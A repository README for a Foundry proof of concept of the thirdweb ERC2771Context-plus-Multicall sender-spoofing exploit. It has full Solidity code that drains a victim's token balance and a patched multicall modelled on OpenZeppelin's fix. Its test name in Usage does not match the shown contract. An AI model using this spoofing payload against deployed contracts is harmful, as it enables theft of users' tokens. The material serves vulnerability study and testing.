GianfrancoBazzani / Thirdweb-Exploit-POC-test

Repository to showcase the recent thirdweb exploit, which arose from combining OpenZeppelin's ERC2771Context implementation with a multicall.

Foundry PoC showing how the thirdweb contracts are exploited through the unsafe combination of OpenZeppelin's ERC2771Context with Multicall.

The repository contains the following contracts:

  1. Forwarder.sol - Mimics a relayer (the ERC-2771 trusted forwarder): the attacker calls it, and it forwards the call to the ERC-20 token.
  2. ThirdWebErc20.sol - A simplified token that has the vulnerable multicall function and inherits from OpenZeppelin's ERC2771Context; the combination of the two is what makes the token vulnerable.

How it works

Say two users, cats and nirlin, have each been minted 100 tokens.

Now cats goes rogue and puts on a black hat. cats can craft a multicall of malicious transfer calls where each inner call has nirlin's address appended to its calldata. Because multicall delegatecalls into the token, msg.sender for every inner call is still the trusted forwarder, so ERC2771Context's _msgSender() reads the appended address and treats nirlin as the sender. The inner calls therefore pass all of the token's checks and move nirlin's tokens to cats without any approval.
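A minimal Foundry test that reproduces the mechanism described above, as an added example: it is not the repository's own code, and the contract names (Context2771, VulnerableToken, FixedToken, Forwarder, SpoofTest) are invented for illustration. It assumes a Foundry project with the standard forge-std remapping. The forwarder skips the signature check a real ERC-2771 forwarder performs and simply appends the caller's address; the token's _msgSender() and multicall reproduce the relevant logic of OpenZeppelin's ERC2771Context and Multicall instead of importing them. The second test shows the shape of OpenZeppelin's fix, which re-appends the real signer to each inner call so the attacker's appended address is no longer the last 20 bytes.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import "forge-std/Test.sol"; // assumes the standard forge-std remapping

// Stand-in for OpenZeppelin's ERC2771Context: when the caller is the trusted
// forwarder, the sender is taken from the last 20 bytes of calldata.
abstract contract Context2771 {
    address internal immutable _trustedForwarder;

    constructor(address forwarder) { _trustedForwarder = forwarder; }

    function _msgSender() internal view returns (address sender) {
        if (msg.sender == _trustedForwarder && msg.data.length >= 20) {
            assembly { sender := shr(96, calldataload(sub(calldatasize(), 20))) }
        } else {
            sender = msg.sender;
        }
    }
}

// Vulnerable token: multicall delegatecalls into itself, so msg.sender is still
// the forwarder for every inner call while the inner calldata is attacker-chosen.
contract VulnerableToken is Context2771 {
    mapping(address => uint256) public balanceOf;

    constructor(address forwarder) Context2771(forwarder) {}

    function mint(address to, uint256 amount) external { balanceOf[to] += amount; } // unrestricted, test only

    function transfer(address to, uint256 amount) external returns (bool) {
        address from = _msgSender();
        require(balanceOf[from] >= amount, "insufficient balance");
        balanceOf[from] -= amount;
        balanceOf[to] += amount;
        return true;
    }

    function multicall(bytes[] calldata data) external virtual returns (bytes[] memory results) {
        results = new bytes[](data.length);
        for (uint256 i = 0; i < data.length; i++) {
            (bool ok, bytes memory ret) = address(this).delegatecall(data[i]);
            require(ok, "inner call failed");
            results[i] = ret;
        }
    }
}

// Patched token, following the shape of OpenZeppelin's fix: when the call came
// through the forwarder, re-append the real signer to every inner call.
contract FixedToken is VulnerableToken {
    constructor(address forwarder) VulnerableToken(forwarder) {}

    function multicall(bytes[] calldata data) external override returns (bytes[] memory results) {
        bytes memory context = msg.sender == _msgSender()
            ? new bytes(0)
            : msg.data[msg.data.length - 20:];
        results = new bytes[](data.length);
        for (uint256 i = 0; i < data.length; i++) {
            (bool ok, bytes memory ret) = address(this).delegatecall(bytes.concat(data[i], context));
            require(ok, "inner call failed");
            results[i] = ret;
        }
    }
}

// Simplified forwarder with no signature check: it appends the caller's address
// the way a real ERC-2771 forwarder appends the verified signer.
contract Forwarder {
    function execute(address target, bytes calldata data) external {
        (bool ok, ) = target.call(abi.encodePacked(data, msg.sender));
        require(ok, "forward failed");
    }
}

contract SpoofTest is Test {
    Forwarder forwarder = new Forwarder();
    address cats = makeAddr("cats");
    address nirlin = makeAddr("nirlin");

    function deploy(bool patched) internal returns (VulnerableToken token) {
        address f = address(forwarder);
        token = patched ? VulnerableToken(new FixedToken(f)) : new VulnerableToken(f);
        token.mint(cats, 100);
        token.mint(nirlin, 100);
    }

    // multicall([ transfer(cats, 100) || nirlin ]): the victim's address is glued
    // onto the inner calldata so the inner _msgSender() resolves to nirlin.
    function payload(VulnerableToken token) internal view returns (bytes memory) {
        bytes[] memory calls = new bytes[](1);
        calls[0] = abi.encodePacked(abi.encodeWithSelector(token.transfer.selector, cats, uint256(100)), nirlin);
        return abi.encodeWithSelector(token.multicall.selector, calls);
    }

    function testVulnerableTokenIsDrained() public {
        VulnerableToken token = deploy(false);
        vm.prank(cats);
        forwarder.execute(address(token), payload(token));
        assertEq(token.balanceOf(cats), 200);
        assertEq(token.balanceOf(nirlin), 0);
    }

    function testFixedTokenResolvesRealSender() public {
        VulnerableToken token = deploy(true);
        vm.prank(cats);
        forwarder.execute(address(token), payload(token));
        // Inner _msgSender() is now cats, so cats only moved 100 tokens to itself.
        assertEq(token.balanceOf(cats), 100);
        assertEq(token.balanceOf(nirlin), 100);
    }
}
```

Run it with `forge test --match-contract SpoofTest -vv`. The first test passes because the inner transfer's calldata ends in nirlin's address while msg.sender is still the forwarder; the second passes because the patched multicall appends the outer call's real signer after the attacker's bytes, so the last 20 bytes are cats again.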

You can read more about the details of how this works in the following breakdowns:

Usage

Build

$ forge build

Test

$ forge test --match-test testMaliciousTransfer -vv

Languages

Solidity 100.0%